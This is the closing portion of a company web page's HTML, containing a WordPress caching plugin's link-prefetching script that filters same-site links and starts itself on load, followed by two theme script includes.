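  /**
   * Returns the part of `url` after siteUrl, with a leading slash and, when
   * configured, a trailing slash.
   */
  RocketPreloadLinks.prototype._getPathname = function (url, prefix) {
    var path = prefix ? url.substring(this.config.siteUrl.length) : url;
    if (!path.startsWith("/")) {
      path = "/" + path;
    }
    return this._shouldAddTrailingSlash(path) ? path + "/" : path;
  };

  /** Truthy when the site uses trailing slashes and the path is not a file. */
  RocketPreloadLinks.prototype._shouldAddTrailingSlash = function (path) {
    return (
      this.config.usesTrailingSlash &&
      !path.endsWith("/") &&
      !this.regex.fileExt.test(path)
    );
  };

  /**
   * A link is eligible when it has not been prefetched yet, its prefix equals
   * siteUrl, it carries no query string or fragment, and it matches neither
   * the exclusion pattern nor the skipped-extension pattern.
   */
  RocketPreloadLinks.prototype._isLinkOk = function (link) {
    if (link === null || typeof link !== "object") {
      return false;
    }
    return (
      !this.prefetched.has(link.href) &&
      link.origin === this.config.siteUrl &&
      link.href.indexOf("?") === -1 &&
      link.href.indexOf("#") === -1 &&
      !this.regex.excludeUris.test(link.href) &&
      !this.regex.images.test(link.href)
    );
  };

  /** Entry point: starts the prefetcher when the config global is present. */
  RocketPreloadLinks.run = function () {
    if (typeof RocketPreloadLinksConfig === "undefined") {
      return;
    }
    var browser = new RocketBrowserCompatibilityChecker({ capture: true, passive: true });
    new RocketPreloadLinks(browser, RocketPreloadLinksConfig).init();
  };

  RocketPreloadLinks.run();
}());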
</script>
<script src='https://www.lacework.com/wp-content/themes/lacework/js/navigation.js?ver=1.0.0' id='lacework-navigation-js'></script>
<script src='https://www.lacework.com/wp-content/themes/lacework/build/scripts/app.built.js?ver=1.1.9' id='script-build-js'></script>
   </body>

</html>
